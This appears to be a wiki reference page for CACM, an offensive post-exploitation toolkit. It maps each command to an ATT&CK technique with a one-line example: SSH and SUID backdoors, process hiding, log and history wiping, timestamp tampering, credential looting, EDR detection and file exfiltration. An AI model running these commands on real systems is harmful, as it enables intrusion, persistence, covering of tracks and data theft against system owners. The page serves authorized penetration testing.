CACM Tools Reference Table
RuoJi6 edited this page Aug 13, 2025 · 2 revisions

| Command | Function | ATT&CK | Example |
|---|---|---|---|
| `dec` | Decrypt file or stdin/stdout using AES-256-GCM | T1027 | `dec secret.txt.enc` |
| `xghostip` | Use a non-existing IP address (Ghost-IP) for network operations | T1090.003 | `xghostip 10.0.0.1 target.com` |
| `np` | Advanced secret scanner with Chinese support | T1552.001 | `np /etc/ \| less -R` |
| `wfind` | Find writeable directories | T1083 | `wfind --world-writable` |
| `xlog` | Remove lines containing specified pattern from file or clear systemd journal | T1070.003 | `xlog /var/log/auth.log "pattern"` |
| `enc` | Encrypt file or stdin/stdout using AES-256-GCM | T1027 | `enc secret.txt` |
| `sub` | Query crt.sh/ip-thc for all sub-domains | T1590.005 | `sub example.com` |
| `ws` | WhatServer - display server's essentials | T1082 | `ws -v -o info.txt` |
| `bin` | Download useful static binaries | T1105 | `bin nmap curl jq` |
| `hide` | Hide a process | T1055 | `hide 1234` |
| `notime` | Execute a command at the specified file's mtime (requires root) | T1070.006 | `notime /etc/passwd "touch file"` |
| `scan` | Advanced port scanner with service detection | T1046 | `scan 192.168.1.0/24 -p 22,80,443` |
| `xscp` | Silently transfer files using SCP with stealth features | T1021.004 | `xscp --stealth file.txt user@host:/tmp/` |
| `xsu` | Switch user and execute commands | T1134.001 | `xsu root "id"` |
| `ctime` | Set ctime to file's mtime (requires root) | T1070.006 | `ctime /tmp/file` |
| `dns` | Resolve domain name to IPv4 | T1590.005 | `dns example.com MX` |
| `lpe` | Run linPEAS/winPEAS for privilege escalation detection | T1068 | `lpe --fast` |
| `xhome` | Create hidden temporary HOME directory | T1564.001 | `xhome /tmp/.workspace` |
| `transfer` | Upload a file or directory to file sharing service | T1041 | `transfer file.txt --service transfer.sh` |
| `xbounce` | Forward TCP traffic to destination host (TCP proxy) | T1090.001 | `xbounce :8080 target.com:80` |
| `xtmux` | Hidden tmux sessions (won't show with 'tmux list-sessions') | T1564.001 | `xtmux new -s hidden` |
| `common` | Common useful commands (lt, ltr, lss, lssr, psg, lsg) | T1083 | `common lt /var/log` |
| `dl` | Request URL using one of curl/wget/python/perl/openssl or native Go HTTP client | T1071.001 | `dl https://example.com/file.txt` |
| `memexec` | Start binary in memory | T1055 | `memexec /usr/bin/id` |
| `shred` | Securely delete a file by overwriting with random data | T1070.004 | `shred -u sensitive.txt` |
| `tit` | Sniff/strace the User Input - Monitor process read/write system calls | T1056.001 | `tit read 1234` |
| `xpty` | Show all terminals / logged in users | T1033 | `xpty -v` |
| `edr` | Detect EDR/AV security products | T1518.001 | `edr --type av` |
| `loot` | Display common secrets and credentials | T1552.001 | `loot --passwords` |
| `find_subdomains` | Search files for sub-domain | T1083 | `find_subdomains company.com` |
| `hgrep` | Grep for pattern, output for humans | T1083 | `hgrep password /etc/` |
| `notime_cp` | Copy file. Keep birth-time, ctime, mtime & atime | T1070.006 | `notime_cp source.txt dest.txt` |
| `rdns` | Reverse DNS from multiple public databases | T1590.005 | `rdns 192.168.1.0/24` |
| `xssh` | Silently log in to remote host with stealth features | T1021.004 | `xssh user@host --stealth` |
| `ssh_backdoor` | SSH backdoor user persistence | T1136.001 | `ssh_backdoor create backup_user` |
| `suidshell` | Create SUID shell backdoor | T1548.001 | `suidshell create /tmp/.shell` |
| `portmux` | Port multiplexing | T1090.001 | `portmux setup 22 4444` |
| `sshmon` | SSH monitoring and data transmission | T1040 | `sshmon start` |
| `historydel` | Delete command history records | T1070.003 | `historydel 100-200` |

- sub: Subdomain discovery
- ws: System information collection
- scan: Port scanning
- dns: DNS queries
- rdns: Reverse DNS queries
- xpty: Terminal user discovery
- edr: Security product detection
- wfind: Writable directory discovery
- hgrep: Advanced text search
- find_subdomains: Subdomain file search
- enc: File encryption
- dec: File decryption
- shred: Secure deletion
- np: Advanced secret scanner
- loot: Credential collection
- dl: Multi-protocol download
- xbounce: TCP traffic forwarding
- xghostip: Ghost IP operations
- xssh: Stealth SSH connection
- xscp: Stealth file transfer
- transfer: File upload service
- hide: Process hiding
- tit: User input monitoring
- memexec: Memory execution
- xsu: User switching
- xhome: Hidden working directory
- xtmux: Hidden tmux sessions
- bin: Tool download
- lpe: Privilege escalation detection
- ssh_backdoor: SSH backdoor user
- suidshell: SUID shell backdoor
- portmux: Port multiplexing
- sshmon: SSH monitoring
- notime: Timestamp disguised execution
- ctime: Modify creation time
- notime_cp: Timestamp preserving copy
- xlog: Log cleaning
- historydel: Command history cleanup
- common: Common command collection

```bash
# Set encryption key
export HS_TOKEN="your_secret_key_here"
# Use environment variable for encryption
echo "sensitive data" | enc
# Use environment variable for decryption
cat encrypted_file.enc | dec
```

```bash
# Set CACM working directory
export CACM_HOME="/tmp/.cacm_workspace"
# Tool will automatically use this directory for temporary files
```

- Authorized Testing Only: This tool is for authorized penetration testing and security research only
- Comply with Laws: Strictly comply with local laws and regulations, do not use for illegal activities
- Obtain Clear Authorization: Must obtain clear written authorization from target system owners before use

Some functions require root privileges to work properly, including:

- `notime`, `ctime`, `notime_cp` - Timestamp operations
- `hide` - Process hiding
- Some system-level operations

CACM (Come and catch me) - Advanced Penetration Testing Tool v1.0